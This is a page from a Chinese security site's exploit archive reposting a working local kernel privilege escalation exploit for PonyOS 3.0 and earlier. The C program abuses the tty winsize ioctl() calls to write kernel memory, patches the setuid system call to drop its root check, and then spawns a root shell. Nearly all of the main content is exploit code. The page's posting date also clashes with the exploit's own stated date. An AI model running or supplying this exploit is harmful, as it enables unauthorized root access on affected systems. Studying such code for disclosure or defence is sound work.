首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit
来源:https://raw.githubusercontent.com/HackerFantastic 作者:Fantastic 发布时间:2015-06-03  

# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
# Google Dork: [if applicable]
# Date: 29th June 2015
# Exploit Author: HackerFantastic
# Vendor Homepage: www.ponyos.org
# Software Link: [download link if available]
# Version: [app version] PonyOS <= 3.0
# Tested on: PonyOS 3.0
# CVE : N/A

# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c

/* PonyOS <= 3.0 tty ioctl() root exploit
  ========================================
  PonyOS 0.4.99-mlp had two kernel vulnerabilities
  disclosed in April 2013 that could be leveraged
  to read/write arbitrary kernel memory. This is
  due to tty winsize ioctl() allowing to read/write
  arbitrary memory. This exploit patches the setuid
  system call to remove a root uid check allowing
  any process to obtain root privileges.

  John Cartwright found these flaws and others here:
  https://www.exploit-db.com/exploits/24933/

  Written for educational purposes only. Enjoy! 

   -- prdelka

*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>

int main(){
 struct winsize ws;
 printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
 memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
 ioctl(0, TIOCSWINSZ, &ws);
 ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
 printf("[-] patched sys_setuid()\n");
 __asm("movl $0x18,%eax");
 __asm("xorl %ebx,%ebx");
 __asm("int $0x7F");
 printf("[-] Got root?\n");
 system("/bin/sh");
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows - Local Priv
·Seagate Central 2014.0410.0026
·D-Link Devices HNAP SOAPAction
·Seagate Central 2014.0410.0026
·IBM Security AppScan 9.0.2 Rem
·Jildi FTP Client Buffer Overfl
·WebDrive 12.2 Buffer Overflow
·Jildi FTP Client 1.5.6 (SEH) B
·PonyOS 3.0 VFS Privilege Escal
·JDownloader 2 Beta Directory T
·PonyOS <= 3.0 - ELF Loader Pri
·Golden FTP 5.00 Denial Of Serv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved